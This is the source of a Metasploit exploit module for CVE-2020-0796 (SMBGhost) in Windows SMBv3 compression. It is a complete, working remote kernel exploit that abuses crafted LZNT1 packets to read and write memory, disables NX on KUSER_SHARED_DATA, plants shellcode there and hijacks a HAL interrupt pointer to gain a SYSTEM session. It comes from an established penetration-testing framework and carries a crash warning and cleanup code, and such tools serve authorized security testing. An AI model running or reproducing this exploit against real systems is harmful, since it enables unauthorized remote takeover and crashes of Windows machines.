##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  LZNT1 = RubySMB::Compression::LZNT1

  # KUSER_SHARED_DATA offsets, these are defined by the module and are therefore target independent
  KSD_VA_MAP = 0x800
  KSD_VA_PMDL = 0x900
  KSD_VA_SHELLCODE = 0x950 # needs to be the highest offset for #cleanup

  MAX_READ_RETRIES = 5
  WRITE_UNIT = 0xd0

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMBv3 Compression Buffer Overflow',
        'Description' => %q{
          A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
          execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code
          in the context of the kernel, finally yielding a session as NT AUTHORITY\SYSTEM in spoolsv.exe. Exploitation
          can take a few minutes as the necessary data is gathered.
        },
        'Author' => [
          'hugeh0ge', # Ricerca Security research, detailed technique description
          'chompie1337', # PoC on which this module is based
          'Spencer McIntyre', # msf module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2020-0796' ],
          [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],
          [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],
          # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit
          [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
          [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'WfsDelay' => 10
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 600,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows 10 v1903-1909 x64',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'OverflowSize' => 0x1100,
              'LowStubFingerprint' => 0x1000600e9,
              'KuserSharedData' => 0xfffff78000000000,
              # Offset(From,To) => Bytes
              'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,
              'Offset(LowStub,SelfVA)' => 0x78,
              'Offset(LowStub,PML4)' => 0xa0,
              'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,
              'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18
            }
          ]
        ],
        'DisclosureDate' => '2020-03-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
          'Stability' => [ CRASH_OS_RESTARTS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ],
          'SideEffects' => []
        }
      )
    )
    register_options([Opt::RPORT(445),])
    register_advanced_options([
      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true])
    ])
  end

  def check
    begin
      client = RubySMB::Client.new(
        RubySMB::Dispatcher::Socket.new(connect(false)),
        username: '',
        password: '',
        smb1: false,
        smb2: false,
        smb3: true
      )
      protocol = client.negotiate
      client.disconnect!
    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError
      return CheckCode::Unknown
    rescue Errno::ECONNRESET
      return CheckCode::Unknown
    rescue ::Exception => e # rubocop:disable Lint/RescueException
      vprint_error("#{rhost}: #{e.class} #{e}")
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless protocol == 'SMB3'
    return CheckCode::Safe unless client.dialect == '0x0311'

    lznt1_algorithm = RubySMB::SMB2::CompressionCapabilities::COMPRESSION_ALGORITHM_MAP.key('LZNT1')
    return CheckCode::Safe unless client.server_compression_algorithms.include?(lznt1_algorithm)

    CheckCode::Detected
  end

  def smb_negotiate
    # need a custom negotiate function because the responses will be corrupt while reading memory
    sock = connect(false)
    dispatcher = RubySMB::Dispatcher::Socket.new(sock)

    packet = RubySMB::SMB2::Packet::NegotiateRequest.new
    packet.client_guid = SecureRandom.random_bytes(16)
    packet.set_dialects((RubySMB::Client::SMB2_DIALECT_DEFAULT + RubySMB::Client::SMB3_DIALECT_DEFAULT).map { |d| d.to_i(16) })

    packet.capabilities.large_mtu = 1
    packet.capabilities.encryption = 1

    nc = RubySMB::SMB2::NegotiateContext.new(
      context_type: RubySMB::SMB2::NegotiateContext::SMB2_PREAUTH_INTEGRITY_CAPABILITIES
    )
    nc.data.hash_algorithms << RubySMB::SMB2::PreauthIntegrityCapabilities::SHA_512
    nc.data.salt = "\x00" * 32
    packet.add_negotiate_context(nc)

    nc = RubySMB::SMB2::NegotiateContext.new(
      context_type: RubySMB::SMB2::NegotiateContext::SMB2_COMPRESSION_CAPABILITIES
    )
    nc.data.flags = 1
    nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZNT1
    packet.add_negotiate_context(nc)

    dispatcher.send_packet(packet)
    dispatcher
  end

  def write_primitive(data, addr)
    dispatcher = smb_negotiate
    dispatcher.tcp_socket.get_once  # disregard the response

    uncompressed_data = rand(0x41..0x5a).chr * (target['OverflowSize'] - data.length)
    uncompressed_data << "\x00" * target['Offset(SrvnetBufferHdr,pNetRawBuffer)']
    uncompressed_data << [ addr ].pack('Q<')

    pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(
      original_compressed_segment_size: 0xffffffff,
      compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,
      offset: data.length,
      compressed_data: (data + LZNT1.compress(uncompressed_data)).bytes
    )
    dispatcher.send_packet(pkt)
    dispatcher.tcp_socket.close
  end

  def write_srvnet_buffer_hdr(data, offset)
    dispatcher = smb_negotiate
    dispatcher.tcp_socket.get_once  # disregard the response

    dummy_data = rand(0x41..0x5a).chr * (target['OverflowSize'] + offset)
    pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(
      original_compressed_segment_size: 0xffffefff,
      compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,
      offset: dummy_data.length,
      compressed_data: (dummy_data + CorruptLZNT1.compress(data)).bytes
    )
    dispatcher.send_packet(pkt)
    dispatcher.tcp_socket.close
  end

  def read_primitive(phys_addr)
    value = @memory_cache[phys_addr]
    return value unless value.nil?

    vprint_status("Reading from physical memory at index: 0x#{phys_addr.to_s(16).rjust(16, '0')}")
    fake_mdl = MDL.new(
      mdl_size: 0x48,
      mdl_flags: 0x5018,
      mapped_system_va: (target['KuserSharedData'] + KSD_VA_MAP),
      start_va: ((target['KuserSharedData'] + KSD_VA_MAP) & ~0xfff),
      byte_count: 600,
      byte_offset: ((phys_addr & 0xfff) + 0x4)
    )
    phys_addr_enc = (phys_addr & 0xfffffffffffff000) >> 12

    (MAX_READ_RETRIES * 2).times do |try|
      write_primitive(fake_mdl.to_binary_s + ([ phys_addr_enc ] * 3).pack('Q<*'), (target['KuserSharedData'] + KSD_VA_PMDL))
      write_srvnet_buffer_hdr([(target['KuserSharedData'] + KSD_VA_PMDL)].pack('Q<'), target['Offset(SrvnetBufferHdr,pMDL1)'])

      MAX_READ_RETRIES.times do |_|
        dispatcher = smb_negotiate
        blob = dispatcher.tcp_socket.get_once
        dispatcher.tcp_socket.close
        next '' if blob.nil?
        next if blob[4..7] == "\xfeSMB".b

        @memory_cache[phys_addr] = blob
        return blob
      end
      sleep try**2
    end

    fail_with(Failure::Unknown, 'Failed to read physical memory')
  end

  def find_low_stub
    common = [0x13000].to_enum # try the most common value first
    all = (0x1000..0x100000).step(0x1000)
    (common + all).each do |index|
      buff = read_primitive(index)
      entry = buff.unpack('Q<').first
      next unless (entry & 0xffffffffffff00ff) == (target['LowStubFingerprint'] & 0xffffffffffff00ff)

      lowstub_va = buff[target['Offset(LowStub,SelfVA)']...(target['Offset(LowStub,SelfVA)'] + 8)].unpack('Q<').first
      print_status("Found low stub at physical address 0x#{index.to_s(16).rjust(16, '0')}, virtual address 0x#{lowstub_va.to_s(16).rjust(16, '0')}")
      pml4 = buff[target['Offset(LowStub,PML4)']...(target['Offset(LowStub,PML4)'] + 8)].unpack('Q<').first
      print_status("Found PML4 at 0x#{pml4.to_s(16).rjust(16, '0')} " + { 0x1aa000 => '(BIOS)', 0x1ad000 => '(UEFI)' }.fetch(pml4, ''))

      phal_heap = lowstub_va & 0xffffffffffff0000
      print_status("Found HAL heap at 0x#{phal_heap.to_s(16).rjust(16, '0')}")

      return { pml4: pml4, phal_heap: phal_heap }
    end

    fail_with(Failure::Unknown, 'Failed to find the low stub')
  end

  def find_pml4_selfref(pointers)
    search_len = 0x1000
    index = pointers[:pml4]

    while search_len > 0
      buff = read_primitive(index)
      buff = buff[0...-(buff.length % 8)]
      buff.unpack('Q<*').each_with_index do |entry, i|
        entry &= 0xfffff000
        next unless entry == pointers[:pml4]

        selfref = ((index + (i * 8)) & 0xfff) >> 3
        pointers[:pml4_selfref] = selfref
        print_status("Found PML4 self-reference entry at 0x#{selfref.to_s(16).rjust(4, '0')}")
        return pointers
      end
      search_len -= [buff.length, 8].max
      index += [buff.length, 8].max
    end

    fail_with(Failure::Unknown, 'Failed to leak the PML4 self reference')
  end

  def get_phys_addr(pointers, va_addr)
    pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))
    pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))
    pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))
    pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))

    pml4e = pointers[:pml4] + pml4_index * 8
    pdpt_buff = read_primitive(pml4e)

    pdpt = pdpt_buff.unpack('Q<').first & 0xfffff000
    pdpte = pdpt + pdpt_index * 8
    pdt_buff = read_primitive(pdpte)

    pdt = pdt_buff.unpack('Q<').first & 0xfffff000
    pdte = pdt + pdt_index * 8
    pt_buff = read_primitive(pdte)

    pt = pt_buff.unpack('Q<').first
    unless pt & (1 << 7) == 0
      return (pt & 0xfffff000) + (pt_index & 0xfff) * 0x1000 + (va_addr & 0xfff)
    end

    pt &= 0xfffff000
    pte = pt + pt_index * 8
    pte_buff = read_primitive(pte)
    (pte_buff.unpack('Q<').first & 0xfffff000) + (va_addr & 0xfff)
  end

  def disable_nx(pointers, addr)
    lb = (0xffff << 48) | (pointers[:pml4_selfref] << 39)
    ub = ((0xffff << 48) | (pointers[:pml4_selfref] << 39) + 0x8000000000 - 1) & 0xfffffffffffffff8
    pte_va = ((addr >> 9) | lb) & ub

    phys_addr = get_phys_addr(pointers, pte_va)
    orig_val = read_primitive(phys_addr).unpack1('Q<')
    overwrite_val = orig_val & ((1 << 63) - 1)
    write_primitive([ overwrite_val ].pack('Q<'), pte_va)
    { pte_va: pte_va, original: orig_val }
  end

  def search_hal_heap(pointers)
    va_cursor = pointers[:phal_heap]
    end_va = va_cursor + 0x20000

    while va_cursor < end_va
      phys_addr = get_phys_addr(pointers, va_cursor)
      buff = read_primitive(phys_addr)
      buff = buff[0...-(buff.length % 8)]
      values = buff.unpack('Q<*')
      window_size = 8 # using a sliding window to fingerprint the memory
      0.upto(values.length - window_size) do |i| # TODO: if the heap structure exists over two pages, this will break
        va = va_cursor + (i * 8)
        window = values[i...(i + window_size)]
        next unless window[0...3].all? { |value| value & 0xfffff00000000000 == 0xfffff00000000000 }
        next unless window[4...8].all? { |value| value & 0xffffff0000000000 == 0xfffff80000000000 }
        next unless window[3].between?(0x20, 0x40)
        next unless (window[0] - window[2]).between?(0x80, 0x180)

        phalp_ari = read_primitive(get_phys_addr(pointers, va) + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']).unpack('Q<').first
        next if read_primitive(get_phys_addr(pointers, phalp_ari))[0...8] != "\x48\x89\x6c\x24\x20\x56\x41\x54" # mov qword ptr [rsp+20h], rbp; push rsi; push r12

        # looks legit (TM), lets hope for the best
        # use WinDBG to validate the hal!HalpInterruptController value manually
        # 0: kd> dq poi(hal!HalpInterruptController) L1
        pointers[:pHalpInterruptController] = va
        print_status("Found hal!HalpInterruptController at 0x#{va.to_s(16).rjust(16, '0')}")

        # use WinDBG to validate the hal!HalpApicRequestInterrupt value manually
        # 0: kd> dq u poi(poi(hal!HalpInterruptController)+78) L1
        pointers[:pHalpApicRequestInterrupt] = phalp_ari
        print_status("Found hal!HalpApicRequestInterrupt at 0x#{phalp_ari.to_s(16).rjust(16, '0')}")
        return pointers
      end

      va_cursor += buff.length
    end
    fail_with(Failure::Unknown, 'Failed to leak the address of hal!HalpInterruptController')
  end

  def build_shellcode(pointers)
    source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'), mode: 'rb')
    edata = Metasm::Shellcode.assemble(Metasm::X64.new, source).encoded
    user_shellcode = payload.encoded
    edata.fixup 'PHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpApicRequestInterrupt]
    edata.fixup 'PPHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']
    edata.fixup 'USER_SHELLCODE_SIZE' => user_shellcode.length
    edata.data + user_shellcode
  end

  def exploit
    if datastore['DefangedMode']
      warning = <<~EOF


        Are you SURE you want to execute this module? There is a high probability that even when the exploit is
        successful the remote target will crash within about 90 minutes.

        Disable the DefangedMode option to proceed.
      EOF

      fail_with(Failure::BadConfig, warning)
    end

    fail_with(Failure::BadConfig, "Incompatible payload: #{datastore['PAYLOAD']} (must be x64)") unless payload.arch.include? ARCH_X64
    @memory_cache = {}
    @shellcode_length = 0
    pointers = find_low_stub
    pointers = find_pml4_selfref(pointers)
    pointers = search_hal_heap(pointers)

    @nx_info = disable_nx(pointers, target['KuserSharedData'])
    print_status('KUSER_SHARED_DATA PTE NX bit cleared!')

    shellcode = build_shellcode(pointers)
    vprint_status("Transferring #{shellcode.length} bytes of shellcode...")
    @shellcode_length = shellcode.length
    write_bytes = 0
    while write_bytes < @shellcode_length
      write_sz = [WRITE_UNIT, @shellcode_length - write_bytes].min
      write_primitive(shellcode[write_bytes...(write_bytes + write_sz)], (target['KuserSharedData'] + KSD_VA_SHELLCODE) + write_bytes)
      write_bytes += write_sz
    end
    vprint_status('Transfer complete, hooking hal!HalpApicRequestInterrupt to trigger execution...')
    write_primitive([(target['KuserSharedData'] + KSD_VA_SHELLCODE)].pack('Q<'), pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)'])
  end

  def cleanup
    return unless @memory_cache&.present?

    if @nx_info&.present?
      print_status('Restoring the KUSER_SHARED_DATA PTE NX bit...')
      write_primitive([ @nx_info[:original] ].pack('Q<'), @nx_info[:pte_va])
    end

    # need to restore the contents of KUSER_SHARED_DATA to zero to avoid a bugcheck
    vprint_status('Cleaning up the contents of KUSER_SHARED_DATA...')
    start_va = target['KuserSharedData'] + KSD_VA_MAP - WRITE_UNIT
    end_va = target['KuserSharedData'] + KSD_VA_SHELLCODE + @shellcode_length
    (start_va..end_va).step(WRITE_UNIT).each do |cursor|
      write_primitive("\x00".b * [WRITE_UNIT, end_va - cursor].min, cursor)
    end
  end

  module CorruptLZNT1
    def self.compress(buf, chunk_size: 0x1000)
      out = ''
      until buf.empty?
        chunk = buf[0...chunk_size]
        compressed = LZNT1.compress_chunk(chunk)

        # always use the compressed chunk, even if it's larger
        out << [ 0xb000 | (compressed.length - 1) ].pack('v')
        out << compressed

        buf = buf[chunk_size..]
        break if buf.nil?
      end

      out << [ 0x1337 ].pack('v')
      out
    end
  end

  class MDL < BinData::Record
    # https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_MDL
    endian :little
    uint64 :next_mdl
    uint16 :mdl_size
    uint16 :mdl_flags
    uint16 :allocation_processor_number
    uint16 :reserved
    uint64 :process
    uint64 :mapped_system_va
    uint64 :start_va
    uint32 :byte_count
    uint32 :byte_offset
  end
end
